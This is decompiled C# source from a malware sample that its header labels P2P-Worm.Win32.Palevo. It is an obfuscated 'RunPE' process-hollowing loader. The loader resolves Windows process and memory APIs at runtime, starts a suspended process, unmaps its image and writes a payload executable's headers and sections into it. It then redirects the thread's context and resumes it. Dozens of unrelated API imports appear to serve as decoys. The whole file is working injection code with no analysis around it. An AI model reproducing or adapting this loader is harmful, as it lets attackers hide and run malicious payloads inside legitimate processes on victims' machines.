// Decompiled with JetBrains decompiler // Type: buffy // Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using System; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; public class buffy { public const long ASDFASFASF = 2778; public const long FASFASFASF = 60116; public const long AFSFASFASCFC = 218; public const long ASDASCASDASD = 218; public const long BVCXBXCBXCB = 218; public const long BXCBXCBXCB = 253; public const long FSDR3FSF = 218; public const long KKKKKKKKKDDDDDDD = 17247; public const uint FSSSSSSSSSSSSSSSSSS = 218; public static void mickey(byte[] DAS4DA3, string VVVVVVCAE) { object Instance1 = (object) new buffy.Context(); object obj1 = (object) new buffy.Process_Information(); object obj2 = (object) new buffy.Startup_Information(); object obj3 = (object) new buffy.Security_Flags(); object obj4 = (object) new buffy.Security_Flags(); object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned); int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null)); buffy.DOS_Header dosHeader1 = new buffy.DOS_Header(); Type Type = typeof (Marshal); object[] objArray1 = new object[2]; object[] objArray2 = objArray1; object Instance3 = Instance2; object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null)); objArray2[0] = objectValue; objArray1[1] = (object) dosHeader1.GetType(); object[] objArray3 = objArray1; object[] Arguments = objArray3; bool[] flagArray = new bool[2]{ true, false }; bool[] CopyBack = flagArray; object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack); if (flagArray[0]) NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1] { RuntimeHelpers.GetObjectValue(objArray3[0]) }, (string[]) null, (Type[]) null, true, false); buffy.DOS_Header dosHeader2; buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2; NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true); buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U("kernel32", "CreateProcessA"); buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U("kernel32", "GetThreadContext"); buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U("kernel32", "ReadProcessMemory"); buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U("kernel32", "WriteProcessMemory"); buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U("ntdll", "ZwUnmapViewOfSection"); buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U("kernel32", "VirtualAllocEx"); buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U("kernel32", "SetThreadContext"); buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U("kernel32", "ResumeThread"); buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1; string DASDAS3E2_1 = VVVVVVCAE; object obj6 = obj3; buffy.Security_Flags securityFlags1; buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1; ref buffy.Security_Flags local1 = ref securityFlags2; object obj7 = obj4; buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1; ref buffy.Security_Flags local2 = ref securityFlags3; IntPtr num1; IntPtr DSA43R3W1 = num1; object obj8 = obj2; buffy.Startup_Information startupInformation1; buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1; ref buffy.Startup_Information local3 = ref startupInformation2; object obj9 = obj1; buffy.Process_Information processInformation1; buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1; ref buffy.Process_Information local4 = ref processInformation2; int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0; object obj10 = (object) processInformation2; object Instance4 = (object) startupInformation2; object obj11 = (object) securityFlags3; object obj12 = (object) securityFlags2; if (-((uint) num2 > 0U ? 1 : 0) == 0) return; buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers(); IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS)); object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType()); buffy.NT_Headers ntHeaders2; buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2; NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1] { (object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4)) }, (string[]) null, (Type[]) null); NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1] { (object) 65539 }, (string[]) null, (Type[]) null); if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117) return; buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1; string DASDAS3E2_2 = VVVVVVCAE; object obj13 = obj12; securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1; ref buffy.Security_Flags local5 = ref securityFlags2; object obj14 = obj11; securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1; ref buffy.Security_Flags local6 = ref securityFlags3; IntPtr DSA43R3W2 = num1; object obj15 = Instance4; startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1; ref buffy.Startup_Information local7 = ref startupInformation2; object obj16 = obj10; processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1; ref buffy.Process_Information local8 = ref processInformation2; int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0; object Instance5 = (object) processInformation2; object obj17 = (object) startupInformation2; object obj18 = (object) securityFlags3; object obj19 = (object) securityFlags2; if (-((uint) num3 > 0U ? 1 : 0) == 0) return; buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1; object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null); IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1; object obj21 = Instance1; buffy.Context context1; buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1; ref buffy.Context local9 = ref context2; int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0; object Instance6 = (object) context2; buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1; object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null); IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1; int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8)); long num5; int num6 = checked ((int) num5); ref int local10 = ref num6; int num7 = 0; ref int local11 = ref num7; int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11); long num9 = (long) num6; buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1; object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null); IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1; int AL8ZCRFWNU1 = checked ((int) num9); long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1); buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1; object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null); IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1; int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD); int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR; uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U)); if (num11 == 0U) return; buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1; object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null); IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1; int AL8ZCRFWNU2 = checked ((int) num11); byte[] DSAE32_1 = DAS4DA3; int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD); uint num12; int num13 = checked ((int) num12); ref int local12 = ref num13; int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0; uint num15 = checked ((uint) num13); long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248); int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1); int num18 = 0; while (num18 <= num17) { ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40))); buffy.Section_Header sectionHeader1; object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType()); buffy.Section_Header sectionHeader2; sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2; byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)]; int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L)); int index = 0; while (index <= num19) { numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))]; checked { ++index; } } buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1; object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null); IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1; int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU)); byte[] DSAE32_2 = numArray; int da22S3 = checked ((int) sectionHeader1.DA22S3); int num20 = checked ((int) num15); ref int local13 = ref num20; int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0; num15 = checked ((uint) num20); checked { ++num18; } } object bytes = (object) BitConverter.GetBytes(num11); buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1; object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null); IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1; int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8)); byte[] DSAE32_3 = (byte[]) bytes; int num22 = checked ((int) num15); ref int local14 = ref num22; int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0; num12 = checked ((uint) num22); NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1] { (object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA) }, (string[]) null, (Type[]) null); buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1; object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null); IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1; object obj29 = Instance6; context2 = obj29 != null ? (buffy.Context) obj29 : context1; ref buffy.Context local15 = ref context2; int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0; object obj30 = (object) context2; buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1; object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null); IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1; int num25 = (int) ws2XvbnvO9_2(DASEAS); } [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54); [DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long RpcNsProfileEltAdd( long ProfileNameSyntax, [MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName, ref IntPtr IfId, long MemberNameSyntax, [MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName, long Priority, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation); [DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber); [DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific); [DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long MgmGetNextMfeStats( ref IntPtr pimmStart, ref long pdwBufferSize, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer, ref long pdwNumEntries); [DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long MprAdminDeviceEnum( ref IntPtr hMprServer, long dwLevel, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer, ref long lpdwTotalEntries); [DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long MsiDatabaseImport( ref IntPtr hDatabase, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName); [DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long NdrMesSimpleTypeAlignSize(long handle_t); [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname); [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long NetReplExportDirSetInfo( [MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname, long level, [MarshalAs(UnmanagedType.VBByRefStr)] ref string buf, ref long parm_err); [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long NetUseGetInfo( ref IntPtr UncServerName, ref IntPtr UseName, long level, [MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr); [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags); [DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long ReadConsoleInput( long hConsoleInput, ref IntPtr lpBuffer, long nLength, ref long lpNumberOfEventsRead); [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long ShowWindowAsync(long hWnd, long nCmdShow); [DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long SnmpMgrCtl( ref IntPtr session, long dwCtlCode, ref long lpvInBuffer, long cbInBuffer, ref long lpvOUTBuffer, long cbOUTBuffer, ref long lpcbBytesReturned); [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long AddAuditAccessAceEx( IntPtr pAcl, long dwAceRevision, long AceFlags, long dwAccessMask, ref IntPtr pSid, long bAuditSuccess, long bAuditFailure); [DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long SQLInstallerError( int iError, ref long pfErrorCode, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg, int cbErrorMsgMax, ref int pcbErrorMsg); [DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor); [DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long RasSetCredentials( [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr, ref IntPtr TLPRASCREDENTIALSA, long @bool); [DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long ReadConsole( long hConsoleInput, ref long lpBuffer, long nNumberOfCharsToRead, ref long lpNumberOfCharsRead, ref long lpReserved); [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long ReadEncryptedFileRaw( ref IntPtr pfExportCallback, ref long pvCallbackContext, ref long pvContext); [DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long ReadPrinter( long hPrinter, ref long pBuf, long cdBuf, ref long pNoBytesRead); [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk); [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long ReleaseSemaphore( long hSemaphore, long lReleaseCount, ref long lpPreviousCount); [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite); [DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long GetStringTypeEx( long Locale, long dwInfoType, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr, long cchSrc, ref int lpCharType); [DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long GetVolumePathName( [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName, long cchBufferLength); [DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong); [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue); [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern IntPtr ToAscii( long uVirtKey, long uScanCode, ref byte lpbKeyState, ref long lpwTransKey, long fuState); private static T TXXY5U8D2U(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T)); public struct Context { public uint II69TOHMUR; public uint d2; public uint das; public uint d9; public uint ad; public uint dsa; public uint ds; public buffy.Save Save; public uint dh; public uint sad; public uint da; public uint MD; public uint RD; public uint mSI; public uint WDA; public uint AD3; public uint D21; public uint AS4; public uint K32; public uint F2W; public uint HHJ; public uint ADF5; public uint GSSA; public uint DSAAA; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)] public byte[] er6rgdr65; } public struct Save { public uint KD7JX2MXT; public uint JCNS3ZPSXO; public uint DAS3; public uint DAS23; public uint ADSA; public uint DAF35; public uint FA32D; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)] public byte[] FSDRF43; public uint FA32QA; } public struct Misc { public uint SDUHRL; public uint GSIJ; } public struct Section_Header { public byte FSDPOU4PO3; public buffy.Misc Mi2sc; public uint AL8ZCRFWNU; public uint DA22S3; public uint PoinEEter; public uint E2Q4RS; public uint FS523QF; public uint FSB43FSD4; public uint QBFAS4E; public uint AS32QFZS; } public struct Process_Information { public IntPtr DAS4QQW; public IntPtr RFSER; public int TGJWE; public int SDFFFFFFFFFF; } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct Startup_Information { public int CSZE; public string FSDR4G; public string AAAAAAAAAA; public string AADDDDDDD; public int ADA; public int C; public int AEDS; public int DASDDDD; public int XASE4; public int DAS3EDFZ; public int DVA3ES; public int CCCCQ; public short FDSRS; public short VYE5X; public int KHJKIHJK; public int KHJKHJK; public int KHJKHJ; public int KHJKJHK; } public struct Security_Flags { public int GFSETWE; public IntPtr EWEWWW; public int DASDAS; } public struct DOS_Header { public ushort DASDASFASF; public ushort QWEQWE; public ushort EQWEQWEQWE; public ushort HFGHFGHFGH; public ushort HFGHFGHFG; public ushort DASD444444; public ushort DASFASE33; public ushort DASKGHJ; public ushort DASVZDF; public ushort VXCVXC; public ushort VXCVXCV; public ushort EWECS; public ushort EWADC; public ushort UADA3; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] public ushort[] ReservWWWWWWWWWWWWWWWedA; public ushort DAS4E; public ushort UJJ; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)] public ushort[] DDDDDDDDD; public int DASE3ASDAS; } public struct NT_Headers { public uint SSSSSSSSSSSQ; public buffy.File_Header DSEEEEE; public buffy.Optional_Headers OOOU; } public struct File_Header { public ushort ITTTTTTTT; public ushort DAAAAAAAA3; public uint HRFTYTYTR; public uint GJGFSFS; public uint FSVGY; public ushort FSFV; public ushort A34FFC; } public struct Optional_Headers { public ushort WWWWWWWWW; public byte MaAAAAAAAAAAAjor; public byte MiSSSSSSSSSSSnor; public uint SSSSSSSSSSSSS; public uint FFFFFFFFFFF; public uint XXXXXXXX; public uint DDDDDDDDAAA; public uint FSSSSSSS; public uint RSFS43; public uint DFAZDASD; public uint SectionA; public uint FileA; public ushort GDFTDFFFF; public ushort HGDFHD564; public ushort GD5ERGD; public ushort FSD5YHD; public ushort ASDASG; public ushort AS4ASAS; public uint CCC; public uint DASRDASRASR; public uint WQDASDASD; public uint Assssssss; public ushort fsd4s; public ushort fjio; public uint dasrlajstpoi; public uint dasdraskyjhuasp; public uint SHRedas4wa9uqserve; public uint fsdtsysyt; public uint eawdasdas3; public uint Cocccunt; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] public buffy.Data_Directory[] GSDGSDT4; } public struct Data_Directory { public uint ewq34q234; public uint das34aw33; } public delegate bool GN04L0ER8I( string ASFASE3, string DASDAS3E2, ref buffy.Security_Flags DASCASE, ref buffy.Security_Flags CASE222, bool DAS432E, uint AEDFKJK32, IntPtr DSA43R3W, string ase32ew, [In] ref buffy.Startup_Information das43fsa, out buffy.Process_Information das3); public delegate bool ZGOQ8VM05M( IntPtr DASE32, int AL8ZCRFWNU, byte[] DSAE32, int DASEADAS, out int ASD43FA); public delegate int Q7QRRP639W( IntPtr FASFDASDAS, int AL8ZCRFWNU, ref int CAS32, int ASDASC, ref int CASTWE); public delegate IntPtr W6CTR6GLCC( IntPtr DASE43E, int AL8ZCRFWNU, uint DASCAS3, uint DAS3, uint DAS32); public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU); public delegate uint WS2XVBNVO9(IntPtr DASEAS); public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43); public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434); }